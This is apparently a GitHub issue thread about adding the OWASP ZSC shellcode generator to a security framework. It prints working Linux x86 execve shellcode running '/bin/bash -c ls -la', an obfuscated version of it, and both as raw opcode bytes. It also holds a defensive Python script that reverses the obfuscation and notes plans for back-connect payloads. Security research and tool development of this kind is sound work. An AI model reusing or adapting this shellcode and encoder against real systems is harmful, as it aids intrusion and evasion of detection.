Join the OWASP ZSC to this framework? #90
Hey, this is a great idea. I also think that OWASP ZSC should be added as a library like the icmp library so that other modules can use it to generate payloads. It would be a great addition to the existing framework. I am currently going through the ZSC code to see the way the modules are written. Best Regards.
Hello, I think first of all adding ZSC to this project is a great idea, and we should add ZSC as a library because all the modules will be using that.
Hey, thanks for the comments. @shaddygarg the OWASP ZSC code is a little bit messy, but it has great documentation on GitBook; feel free to look it up. Let me know if anyone has any ideas and thinks it's cool to make this feature available on this project. Regards.
Hey, I added the first simple library for making a sample in my latest commits. It's easy to use any payload now! The first payload is a shellcode generator for linux_x86 with the add_random (optional) obfuscating method!
In [1]: from lib.payload.shellcode.generator.linux_x86.system.engine import start
In [2]: from lib.payload.shellcode.encoder.linux_x86.system.add_random.engine import start as encode
In [3]: from lib.payload.shellcode.opcoder.linux_x86.engine import convert
In [4]: print(start("ls -la"))
push $0xb
pop %eax
cltd
push %edx
push $0x616c9090
pop %ecx
shr $0x10,%ecx
push %ecx
push $0x2d20736c
mov %esp,%esi
push %edx
push $0x632d9090
pop %ecx
shr $0x10,%ecx
push %ecx
mov %esp,%ecx
push %edx
push $0x68
push $0x7361622f
push $0x6e69622f
mov %esp,%ebx
push %edx
push %edi
push %esi
push %ecx
push %ebx
mov %esp,%ecx
int $0x80
In [5]: print(encode(start("ls -la")))
xor %edx,%edx
push %edx
push $0x71304b6f
pop %ebx
push $0xfc3badf
pop %eax
neg %eax
add %ebx,%eax
push %eax
pop %ecx
shr $0x10,%ecx
push %ecx
push $0x70383849
pop %ebx
push $0x4317c4dd
pop %eax
neg %eax
add %ebx,%eax
push %eax
mov %esp,%esi
push %edx
push $0x69536879
pop %ebx
push $0x625d7e9
pop %eax
neg %eax
add %ebx,%eax
push %eax
pop %ecx
shr $0x10,%ecx
push %ecx
mov %esp,%ecx
push %edx
push $0x68
push $0x7944454c
pop %ebx
push $0x5e2e31d
pop %eax
neg %eax
add %ebx,%eax
push %eax
push $0x79377630
pop %ebx
push $0xace1401
pop %eax
neg %eax
add %ebx,%eax
push %eax
mov %esp,%ebx
push %edx
push %edi
push %esi
push %ecx
push %ebx
mov %esp,%ecx
push $0x9
pop %eax
add $0x02,%eax
cltd
int $0x80
In [6]: print(convert(start("ls -la")))
\x6a\x0b\x58\x99\x52\x68\x90\x90\x6c\x61\x59\xc1\xe9\x10\x51\x68\x6c\x73\x20\x2d\x89\xe6\x52\x68\x90\x90\x2d\x63\x59\xc1\xe9\x10\x51\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80
In [7]: print(convert(encode(start("ls -la"))))
\x31\xd2\x52\x68\x59\x5a\x55\x6d\x5b\x68\xc9\xc9\xe8\x0b\x58\xf7\xd8\x01\xd8\x50\x59\xc1\xe9\x10\x51\x68\x53\x38\x67\x6a\x5b\x68\xe7\xc4\x46\x3d\x58\xf7\xd8\x01\xd8\x50\x89\xe6\x52\x68\x44\x7a\x33\x7a\x5b\x68\xb4\xe9\x05\x17\x58\xf7\xd8\x01\xd8\x50\x59\xc1\xe9\x10\x51\x89\xe1\x52\x6a\x68\x68\x67\x59\x67\x75\x5b\x68\x38\xf7\x05\x02\x58\xf7\xd8\x01\xd8\x50\x68\x34\x53\x52\x76\x5b\x68\x05\xf1\xe8\x07\x58\xf7\xd8\x01\xd8\x50\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\x6a\x0a\x58\x83\xc0\x01\x99\xcd\x80
@pradeepjairamani your password generator could be located in I will add a few documents regarding the shellcodes soon! Meanwhile, you can check out the OWASP ZSC docs on GitBook. #1 should be updated.
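As an added analysis example (not code from this thread or from ZSC itself), the script below undoes the add_random scheme visible in the encoded listing above: every original immediate X is emitted as the pair (X+R, R) for a random R and rebuilt at run time as -R + (X+R), and the execve syscall number is split into 0x9 + 0x2. Folding those patterns back lets an analyst read the strings the payload places on the stack. The encoded listing is embedded as constructed sample input copied from the comment; the pattern matching assumes the exact instruction shapes printed there.

```python
import re

MASK = 0xFFFFFFFF
IMM = r"\$(0x[0-9a-f]+)"

# Constructed sample: the add_random-encoded listing from the comment above,
# one instruction per ';' (AT&T syntax exactly as the encoder printed it).
ENCODED = (
    "xor %edx,%edx; push %edx; push $0x71304b6f; pop %ebx; push $0xfc3badf; pop %eax; "
    "neg %eax; add %ebx,%eax; push %eax; pop %ecx; shr $0x10,%ecx; push %ecx; "
    "push $0x70383849; pop %ebx; push $0x4317c4dd; pop %eax; neg %eax; add %ebx,%eax; "
    "push %eax; mov %esp,%esi; push %edx; push $0x69536879; pop %ebx; push $0x625d7e9; "
    "pop %eax; neg %eax; add %ebx,%eax; push %eax; pop %ecx; shr $0x10,%ecx; push %ecx; "
    "mov %esp,%ecx; push %edx; push $0x68; push $0x7944454c; pop %ebx; push $0x5e2e31d; "
    "pop %eax; neg %eax; add %ebx,%eax; push %eax; push $0x79377630; pop %ebx; "
    "push $0xace1401; pop %eax; neg %eax; add %ebx,%eax; push %eax; mov %esp,%ebx; "
    "push %edx; push %edi; push %esi; push %ecx; push %ebx; mov %esp,%ecx; "
    "push $0x9; pop %eax; add $0x02,%eax; cltd; int $0x80"
)

def fold_add_random(listing):
    """Fold 'push $X; pop %ebx; push $Y; pop %eax; neg %eax; add %ebx,%eax; push %eax'
    back into 'push $(X-Y)', and 'push $a; pop %eax; add $b,%eax' into 'push $(a+b); pop %eax'."""
    ins = [s.strip() for s in re.split(r"[;\n]", listing) if s.strip()]
    out, i = [], 0
    while i < len(ins):
        m = re.fullmatch(r"push " + IMM, ins[i])
        if m and ins[i + 1:i + 2] == ["pop %ebx"]:
            m2 = re.fullmatch(r"push " + IMM, ins[i + 2]) if i + 2 < len(ins) else None
            if m2 and ins[i + 3:i + 7] == ["pop %eax", "neg %eax", "add %ebx,%eax", "push %eax"]:
                x, y = int(m.group(1), 16), int(m2.group(1), 16)
                out.append("push $0x%x" % ((x - y) & MASK))  # eax = -Y + X = original immediate
                i += 7
                continue
        if m and ins[i + 1:i + 2] == ["pop %eax"]:
            m2 = re.fullmatch(r"add " + IMM + r",%eax", ins[i + 2]) if i + 2 < len(ins) else None
            if m2:  # split syscall number, e.g. 0x9 + 0x2 = 0xb (execve)
                out.append("push $0x%x" % ((int(m.group(1), 16) + int(m2.group(1), 16)) & MASK))
                out.append("pop %eax")
                i += 3
                continue
        out.append(ins[i])
        i += 1
    return out

def pushed_strings(folded):
    """Read each immediate as the little-endian bytes it puts on the stack, keeping
    printable ASCII only (the 0x90 padding the encoder uses for short words is dropped)."""
    words = []
    for s in folded:
        m = re.fullmatch(r"push " + IMM, s)
        if m:
            raw = int(m.group(1), 16).to_bytes(4, "little")
            text = "".join(chr(b) for b in raw if 0x20 <= b < 0x7f)
            if text:
                words.append(text)
    return words
```

Running `pushed_strings(fold_add_random(ENCODED))` on the sample recovers the fragments of "ls -la", "-c" and "/bin/bash" that the first listing in the comment pushes in the clear, which is what a triage script would look for when the encoded form is all that was captured.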
Hello,
To clarify, OWASP ZSC [1] is open-source software written in Python which lets you generate customized shellcode and convert scripts to an obfuscated script. This software can be run on Windows/Linux/OSX with Python.
Bringing OWASP ZSC to this project may help us to generate trustable payloads for exploits (vulnerabilities category); also, after testing a vulnerability, it could be useful for Back-Connect or Meterpreter.
What's your idea to join these two projects together? Should OWASP ZSC be added as a library, a module, or both?
Feel free to share your idea.
Best Regards.